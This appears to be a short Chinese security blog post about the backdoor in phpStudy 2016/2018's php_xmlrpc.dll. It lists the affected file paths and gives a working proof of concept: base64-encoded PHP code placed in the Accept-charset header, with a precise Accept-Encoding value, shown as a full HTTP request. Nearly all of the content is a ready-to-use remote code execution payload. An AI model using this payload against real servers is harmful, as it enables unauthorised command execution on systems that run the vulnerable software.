image.png

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

poc

  1. # 将要执行的代码进行Base64编码,例如:system('whoami');
  2. Accept-charset: c3lzdGVtKCd3aG9hbWknKTs= 
  4. # 注意删除gzip,deflate之间的空格,否则不生效
  5. Accept-Encoding: gzip,deflate

数据包

  1. GET /phpinfo.php HTTP/1.1
  2. Host: 192.168.126.129
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
  7. Accept-Encoding: gzip,deflate
  8. Connection: close
  9. Upgrade-Insecure-Requests: 1
  11. 来源: LuckySec
  12. 文章作者: LuckySec
  13. 文章链接: http://luckyzmj.cn/posts/f9215389.html
  14. 本文章著作权归作者所有,任何形式的转载都请注明出处。

来源: LuckySec
文章作者: LuckySec
文章链接: http://luckyzmj.cn/posts/f9215389.html
本文章著作权归作者所有,任何形式的转载都请注明出处。